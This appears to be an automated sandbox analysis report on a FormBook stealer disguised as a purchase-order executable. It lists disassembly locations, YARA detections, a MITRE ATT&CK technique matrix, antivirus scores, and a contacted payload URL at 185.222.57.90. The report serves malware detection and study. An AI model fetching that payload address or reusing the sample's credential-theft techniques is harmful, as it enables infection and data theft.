      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484FCA0 mov eax, dword ptr fs:[00000030h]11_2_3484FCA0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484FCA0 mov eax, dword ptr fs:[00000030h]11_2_3484FCA0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484FCA0 mov eax, dword ptr fs:[00000030h]11_2_3484FCA0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3485BCA0 mov eax, dword ptr fs:[00000030h]11_2_3485BCA0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3485BCA0 mov eax, dword ptr fs:[00000030h]11_2_3485BCA0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3485BCA0 mov ecx, dword ptr fs:[00000030h]11_2_3485BCA0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3485BCA0 mov eax, dword ptr fs:[00000030h]11_2_3485BCA0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348DFCAB mov eax, dword ptr fs:[00000030h]11_2_348DFCAB
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348DFCAB mov eax, dword ptr fs:[00000030h]11_2_348DFCAB
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348DFCAB mov eax, dword ptr fs:[00000030h]11_2_348DFCAB
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348DFCAB mov eax, dword ptr fs:[00000030h]11_2_348DFCAB
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348DFCAB mov eax, dword ptr fs:[00000030h]11_2_348DFCAB
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348DFCAB mov eax, dword ptr fs:[00000030h]11_2_348DFCAB
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348DFCAB mov eax, dword ptr fs:[00000030h]11_2_348DFCAB
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348DFCAB mov eax, dword ptr fs:[00000030h]11_2_348DFCAB
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348DFCAB mov eax, dword ptr fs:[00000030h]11_2_348DFCAB
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348DFCAB mov eax, dword ptr fs:[00000030h]11_2_348DFCAB
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348DFCAB mov eax, dword ptr fs:[00000030h]11_2_348DFCAB
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348DFCAB mov eax, dword ptr fs:[00000030h]11_2_348DFCAB
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348DFCAB mov eax, dword ptr fs:[00000030h]11_2_348DFCAB
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348DFCAB mov eax, dword ptr fs:[00000030h]11_2_348DFCAB
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34831CC7 mov eax, dword ptr fs:[00000030h]11_2_34831CC7
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34831CC7 mov eax, dword ptr fs:[00000030h]11_2_34831CC7
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34855CC0 mov eax, dword ptr fs:[00000030h]11_2_34855CC0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34855CC0 mov eax, dword ptr fs:[00000030h]11_2_34855CC0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348A3CDB mov eax, dword ptr fs:[00000030h]11_2_348A3CDB
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348A3CDB mov eax, dword ptr fs:[00000030h]11_2_348A3CDB
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348A3CDB mov eax, dword ptr fs:[00000030h]11_2_348A3CDB
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348CFCDF mov eax, dword ptr fs:[00000030h]11_2_348CFCDF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348CFCDF mov eax, dword ptr fs:[00000030h]11_2_348CFCDF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348CFCDF mov eax, dword ptr fs:[00000030h]11_2_348CFCDF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34817CD5 mov eax, dword ptr fs:[00000030h]11_2_34817CD5
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34817CD5 mov eax, dword ptr fs:[00000030h]11_2_34817CD5
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34817CD5 mov eax, dword ptr fs:[00000030h]11_2_34817CD5
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34817CD5 mov eax, dword ptr fs:[00000030h]11_2_34817CD5
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34817CD5 mov eax, dword ptr fs:[00000030h]11_2_34817CD5
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348C1CF9 mov eax, dword ptr fs:[00000030h]11_2_348C1CF9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348C1CF9 mov eax, dword ptr fs:[00000030h]11_2_348C1CF9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348C1CF9 mov eax, dword ptr fs:[00000030h]11_2_348C1CF9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348FBC01 mov eax, dword ptr fs:[00000030h]11_2_348FBC01
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348FBC01 mov eax, dword ptr fs:[00000030h]11_2_348FBC01
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348ABC10 mov eax, dword ptr fs:[00000030h]11_2_348ABC10
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348ABC10 mov eax, dword ptr fs:[00000030h]11_2_348ABC10
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348ABC10 mov ecx, dword ptr fs:[00000030h]11_2_348ABC10
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348EDC27 mov eax, dword ptr fs:[00000030h]11_2_348EDC27
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348EDC27 mov eax, dword ptr fs:[00000030h]11_2_348EDC27
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348EDC27 mov eax, dword ptr fs:[00000030h]11_2_348EDC27
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348F1C3C mov eax, dword ptr fs:[00000030h]11_2_348F1C3C
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3485BC3B mov esi, dword ptr fs:[00000030h]11_2_3485BC3B
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34817C40 mov eax, dword ptr fs:[00000030h]11_2_34817C40
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34817C40 mov ecx, dword ptr fs:[00000030h]11_2_34817C40
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34817C40 mov eax, dword ptr fs:[00000030h]11_2_34817C40
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34817C40 mov eax, dword ptr fs:[00000030h]11_2_34817C40
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348DFC4F mov eax, dword ptr fs:[00000030h]11_2_348DFC4F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34831C60 mov eax, dword ptr fs:[00000030h]11_2_34831C60
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34851C7C mov eax, dword ptr fs:[00000030h]11_2_34851C7C
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481FD80 mov eax, dword ptr fs:[00000030h]11_2_3481FD80
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34819D96 mov eax, dword ptr fs:[00000030h]11_2_34819D96
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34819D96 mov eax, dword ptr fs:[00000030h]11_2_34819D96
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34819D96 mov ecx, dword ptr fs:[00000030h]11_2_34819D96
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34859DAF mov eax, dword ptr fs:[00000030h]11_2_34859DAF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483DDB1 mov eax, dword ptr fs:[00000030h]11_2_3483DDB1
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483DDB1 mov eax, dword ptr fs:[00000030h]11_2_3483DDB1
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483DDB1 mov eax, dword ptr fs:[00000030h]11_2_3483DDB1
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348ADDB1 mov eax, dword ptr fs:[00000030h]11_2_348ADDB1
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348EDDC6 mov eax, dword ptr fs:[00000030h]11_2_348EDDC6
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348ADDC0 mov eax, dword ptr fs:[00000030h]11_2_348ADDC0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348DDDC7 mov eax, dword ptr fs:[00000030h]11_2_348DDDC7
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34823DD0 mov eax, dword ptr fs:[00000030h]11_2_34823DD0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34823DD0 mov eax, dword ptr fs:[00000030h]11_2_34823DD0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34833D00 mov eax, dword ptr fs:[00000030h]11_2_34833D00
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348AFD2A mov eax, dword ptr fs:[00000030h]11_2_348AFD2A
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348AFD2A mov eax, dword ptr fs:[00000030h]11_2_348AFD2A
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34833D20 mov eax, dword ptr fs:[00000030h]11_2_34833D20
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34817D41 mov eax, dword ptr fs:[00000030h]11_2_34817D41
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3485BD4E mov eax, dword ptr fs:[00000030h]11_2_3485BD4E
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3485BD4E mov eax, dword ptr fs:[00000030h]11_2_3485BD4E
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348ADD47 mov eax, dword ptr fs:[00000030h]11_2_348ADD47
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348E1D5A mov eax, dword ptr fs:[00000030h]11_2_348E1D5A
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348E1D5A mov eax, dword ptr fs:[00000030h]11_2_348E1D5A
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348E1D5A mov eax, dword ptr fs:[00000030h]11_2_348E1D5A
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348E1D5A mov eax, dword ptr fs:[00000030h]11_2_348E1D5A
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34827D75 mov eax, dword ptr fs:[00000030h]11_2_34827D75
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34827D75 mov eax, dword ptr fs:[00000030h]11_2_34827D75
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34853E8F mov eax, dword ptr fs:[00000030h]11_2_34853E8F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348ADE9B mov eax, dword ptr fs:[00000030h]11_2_348ADE9B
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34827E96 mov eax, dword ptr fs:[00000030h]11_2_34827E96
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348ADEAA mov eax, dword ptr fs:[00000030h]11_2_348ADEAA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481FEA0 mov eax, dword ptr fs:[00000030h]11_2_3481FEA0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481DEA5 mov eax, dword ptr fs:[00000030h]11_2_3481DEA5
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481DEA5 mov ecx, dword ptr fs:[00000030h]11_2_3481DEA5
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348CDEB0 mov eax, dword ptr fs:[00000030h]11_2_348CDEB0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348CDEB0 mov ecx, dword ptr fs:[00000030h]11_2_348CDEB0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348CDEB0 mov eax, dword ptr fs:[00000030h]11_2_348CDEB0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348CDEB0 mov eax, dword ptr fs:[00000030h]11_2_348CDEB0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348CDEB0 mov eax, dword ptr fs:[00000030h]11_2_348CDEB0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348DDEB0 mov eax, dword ptr fs:[00000030h]11_2_348DDEB0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481BEC0 mov eax, dword ptr fs:[00000030h]11_2_3481BEC0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481BEC0 mov eax, dword ptr fs:[00000030h]11_2_3481BEC0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482BEC0 mov eax, dword ptr fs:[00000030h]11_2_3482BEC0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482BEC0 mov eax, dword ptr fs:[00000030h]11_2_3482BEC0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482BEC0 mov eax, dword ptr fs:[00000030h]11_2_3482BEC0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482BEC0 mov eax, dword ptr fs:[00000030h]11_2_3482BEC0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482BEC0 mov eax, dword ptr fs:[00000030h]11_2_3482BEC0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482BEC0 mov eax, dword ptr fs:[00000030h]11_2_3482BEC0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482BEC0 mov eax, dword ptr fs:[00000030h]11_2_3482BEC0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482BEC0 mov eax, dword ptr fs:[00000030h]11_2_3482BEC0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484FEC0 mov eax, dword ptr fs:[00000030h]11_2_3484FEC0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348AFEC5 mov eax, dword ptr fs:[00000030h]11_2_348AFEC5
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34823EE1 mov eax, dword ptr fs:[00000030h]11_2_34823EE1
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34853EEB mov ecx, dword ptr fs:[00000030h]11_2_34853EEB
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34853EEB mov eax, dword ptr fs:[00000030h]11_2_34853EEB
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34853EEB mov eax, dword ptr fs:[00000030h]11_2_34853EEB
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34823EF4 mov eax, dword ptr fs:[00000030h]11_2_34823EF4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34823EF4 mov eax, dword ptr fs:[00000030h]11_2_34823EF4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34823EF4 mov eax, dword ptr fs:[00000030h]11_2_34823EF4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481DE10 mov eax, dword ptr fs:[00000030h]11_2_3481DE10
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483DE2D mov eax, dword ptr fs:[00000030h]11_2_3483DE2D
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483DE2D mov eax, dword ptr fs:[00000030h]11_2_3483DE2D
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483DE2D mov eax, dword ptr fs:[00000030h]11_2_3483DE2D
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34821E30 mov eax, dword ptr fs:[00000030h]11_2_34821E30
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34821E30 mov eax, dword ptr fs:[00000030h]11_2_34821E30
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34835E40 mov eax, dword ptr fs:[00000030h]11_2_34835E40
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348DDE46 mov eax, dword ptr fs:[00000030h]11_2_348DDE46
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3485BE51 mov eax, dword ptr fs:[00000030h]11_2_3485BE51
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3485BE51 mov eax, dword ptr fs:[00000030h]11_2_3485BE51
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348C9E56 mov ecx, dword ptr fs:[00000030h]11_2_348C9E56
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481BE78 mov ecx, dword ptr fs:[00000030h]11_2_3481BE78
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34831F92 mov ecx, dword ptr fs:[00000030h]11_2_34831F92
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34831F92 mov ecx, dword ptr fs:[00000030h]11_2_34831F92
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34831F92 mov eax, dword ptr fs:[00000030h]11_2_34831F92
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34831F92 mov ecx, dword ptr fs:[00000030h]11_2_34831F92
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34831F92 mov ecx, dword ptr fs:[00000030h]11_2_34831F92
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34831F92 mov eax, dword ptr fs:[00000030h]11_2_34831F92
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34831F92 mov ecx, dword ptr fs:[00000030h]11_2_34831F92
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34831F92 mov ecx, dword ptr fs:[00000030h]11_2_34831F92
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeProcess created: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"Jump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_0040338F EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,LdrInitializeThunk,GetTempPathW,GetWindowsDirectoryW,lstrcatW,LdrInitializeThunk,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,5_2_0040338F

      Stealing of Sensitive Information

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 0000000B.00000002.2689733923.0000000034480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 0000000B.00000002.2689733923.0000000034480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Native API      		1
      Registry Run Keys / Startup Folder      		1
      Access Token Manipulation      		11
      Masquerading      		OS Credential Dumping211
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		1
      Encrypted Channel      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      DLL Side-Loading      		11
      Process Injection      		1
      Access Token Manipulation      		LSASS Memory3
      File and Directory Discovery      		Remote Desktop Protocol1
      Clipboard Data      		1
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      Registry Run Keys / Startup Folder      		11
      Process Injection      		Security Account Manager23
      System Information Discovery      		SMB/Windows Admin SharesData from Network Shared Drive1
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
      DLL Side-Loading      		1
      Deobfuscate/Decode Files or Information      		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture11
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
      Obfuscated Files or Information      		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Purchase Order Purchase Order Purchase Order Purchase Order.exe27%ReversingLabsWin32.Trojan.Generic

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nsk59ED.tmp\System.dll3%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://185.222.57.90/zFSrvbrRquo53.binj0%Avira URL Cloudsafe
      http://185.222.57.90/0%Avira URL Cloudsafe
      http://185.222.57.90/zFSrvbrRquo53.bin550%Avira URL Cloudsafe
      http://185.222.57.90/zFSrvbrRquo53.bin100%Avira URL Cloudmalware

      Domains and IPs

      Contacted Domains

      No contacted domains info

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://185.222.57.90/zFSrvbrRquo53.binfalse
      • Avira URL Cloud: malware
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdPurchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000001.1905312342.00000000005F2000.00000008.00000001.01000000.00000006.sdmpfalse
        		high
        http://www.ftp.ftp://ftp.gopher.Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000001.1905312342.0000000000649000.00000008.00000001.01000000.00000006.sdmpfalse
          		high
          http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdPurchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000001.1905312342.00000000005F2000.00000008.00000001.01000000.00000006.sdmpfalse
            		high
            http://nsis.sf.net/NSIS_ErrorErrorPurchase Order Purchase Order Purchase Order Purchase Order.exefalse
              		high
              http://185.222.57.90/zFSrvbrRquo53.bin55Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000002.2668899476.0000000004688000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
